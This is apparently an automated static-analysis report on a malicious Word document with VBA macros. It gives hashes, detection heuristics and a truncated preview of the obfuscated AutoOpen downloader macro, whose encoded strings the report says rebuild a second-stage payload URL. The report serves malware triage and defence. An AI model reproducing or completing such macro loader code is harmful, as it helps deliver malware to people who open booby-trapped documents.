Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31e66b375181f852…

MALICIOUS

Office (OLE)

159.5 KB Created: 2018-03-27 18:31:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: adb6ad8b4f4f2a9ea1381cea14652bc0 SHA-1: a61b0252e721348e028bd3da29cc296c02b1616a SHA-256: 31e66b375181f85237faf94f5cc641eed5ff94bef9fe376b8db431828839b945
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, including an AutoOpen macro that uses CreateObject to execute code. The FFviw function appears to be a deobfuscation routine that reconstructs a URL. The reconstructed URL is "6@a.5ADIAZAAyAGUAOQAyAGIAYgBjAGEAOAA0AGIAMQA4ADIAYgA0ADkAMwBlAGIAOAAwADcAMgA5ADYANQBlADMAMAAwADYANwBhAGMAZQA5AGQAMgBiADYANQA4AGUAMAA0AGUAMwA3AGYAMwA1ADQAOQBmAGIAY", which is likely a second-stage payload download URL. This indicates a typical macro-based malware delivery mechanism.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 49786 bytes
SHA-256: 8f7bc7eb451fa8502e5a89ea9da5baa0cb4f355b24ff869a5f1ca73836d64648
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 17 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kXilSNkMQvz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wwCusBGiizsZIQ"
Function FawfvMfsoi()
On Error Resume Next
Select Case cArjf
      Case 26957
         NIDAG = CStr(hPASAo + CStr(13578) - jEhWpp * 35369)
      Case 54261
         LdLQs = LoTWi
         bWLEO = Tan(14355 * LPiSO)
End Select
vsBfMCj = FFviw("73t8.AwADgAZgBiADQANAA4AGMAOAA3AGIANgA0AGYAOAAzADAANABlADkAZABhAGQAOABiADYAMgA5AGIAMAAzADUAZQA0ADUAOQA5AGUANgAxADUAMAA4AGEAOABmAGEAOABmAGIAMAAwADYAOAA4ADUAMQA3ADkAMwAxADQAYwBkAGEAYwBkAGQAZQA1AGMkX@", 6, 189)
Select Case vwKNq
      Case 46563
         lzrXud = CStr(NoihRY + CStr(51588) - hVRai * 90687)
      Case 31976
         dKwrwG = bdwwV
         ioJkSK = Tan(43536 * BApwqP)
End Select
Select Case EFmEw
      Case 82515
         hKbict = CStr(tiDrn + CStr(65147) - ZbdYTF * 79947)
      Case 76664
         KGVpo = aErjl
         QUIaw = Tan(86052 * lXfDdY)
End Select
WuilNpIE = FFviw("viIANQAzADcAMgBkADAAZAA1AGUANwA1ADQAMp9GE", 4, 34)
Select Case iIfclz
      Case 87843
         QYHDM = CStr(DzzDwa + CStr(17928) - UzVMz * 5464)
      Case 70888
         DrRIdR = PzmiN
         kTujF = Tan(63629 * jzhwV)
End Select
Select Case AlVbS
      Case 6525
         aQCKlQ = CStr(lamdj + CStr(52499) - rdzzo * 23177)
      Case 87406
         KVLzuZ = hcNpOu
         lGUDES = Tan(64352 * zBzoJH)
End Select
zzlWjXDm = FFviw("6@a.5ADIAZAAyAGUAOQAyAGIAYgBjAGEAOAA0AGIAMQA4ADIAYgA0ADkAMwBlAGIAOAAwADcAMgA5ADYANQBlADMAMAAwADYANwBhAGMAZQA5AGQAMgBiADYANQA4AGUAMAA0AGUAMwA3AGYAMwA1ADQAOQBmAGIAYQBjAGIANREP", 5, 166)
Select Case ddrBo
      Case 11667
         wmVmBt = CStr(QqMYD + CStr(85716) - dlHbFL * 46926)
      Case 20738
         GQbJw = wNFhEI
         hRQnpj = Tan(20162 * PFOhAr)
End Select
Select Case kuTOrq
      Case 66372
         tamdsD = CStr(XEPfh + CStr(54383) - kitRMn * 51286)
      Case 1333
         ikFDz = DjaEpf
         afTkIo = Tan(84227 * MjWqK)
End Select
HJrzNd = FFviw("wCIANABkADTXKsnW", 3, 8)
Select Case UZiuDs
      Case 47694
         tnAXb = CStr(iEcmO + CStr(1688) - Ozbfm * 17105)
      Case 66930
         DiMnG = GvKlmL
         mjjkM = Tan(81967 * HEkcJl)
End Select
Select Case fowuiu
      Case 79414
         LPjLP = CStr(Tjacld + CStr(42217) - Xrvqi * 22331)
      Case 68461
         CbwMz = NaJXC
         fqUtk = Tan(81984 * jwEnrW)
End Select
YujrofsT = FFviw("v6uh3NADcANQA3ADQAZABkAGMANQA3ADEANGb", 7, 29)
Select Case QFwrLd
      Case 61198
         NIMDBv = CStr(ATOaS + CStr(49844) - WCGshD * 35130)
      Case 96696
         HpXGIb = MYXid
         hjpiK = Tan(93948 * ZQEAki)
End Select
Select Case SsGqGt
      Case 94227
         rdbNqC = CStr(UbfLu + CStr(25495) - PqEZMf * 24245)
      Case 26636
         KWqEjF = qpMVNj
         ucjpB = Tan(64060 * nscjcQ)
End Select
pVIJXYdGLlI = FFviw("m4t%MAAzAGYANQA1ADIANAAxADMAYQAyAGUANABiAGUANwA4ADUANABmAGEAMQBhADIAMQA4AGEAYQ9W", 5, 74)
Select Case hhRSin
      Case 32945
         zzUOBp = CStr(irZfp + CStr(19167) - cqKjvX * 56995)
      Case 26858
         GpnII = CjvjDd
         UnfDRJ = Tan(70521 * wackE)
End Select
Select Case VBzhzz
      Case 91049
         GoMJpD = CStr(wiEDF + CStr(28609) - uwAOj * 6341)
      Case 9842
         kscMim = aIGNNC
         JkOcO = Tan(38335 * YKCUHG)
End Select
tUcKLh = FFviw(".kPwMkADAANQBiADcANwBkAGQHRz", 6, 20)
Select Case jlRsk
      Case 32663
         UhcZO = CStr(IwzrB + CStr(22684) - pQADo * 71507)
      Case 93197
         hZsWf = tXoVcl
         pDlCA = Tan(32894 * cNLSvh)
End Select
Select Case DvJkwS
      Case 24898
         WMofP = CStr(fFZXZ + CStr(31353) - CwHPk * 996)
      Case 82495
         jhmSX = zLoOlJ
         sSUdD = Tan(42144 * XKDKVR)
End Select
CmUzjf = FFviw("S4AGQAZgAzADkANABjADkAYwA5ADAAZQAjRMMMF", 2, 32)
Select Case zCUL
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.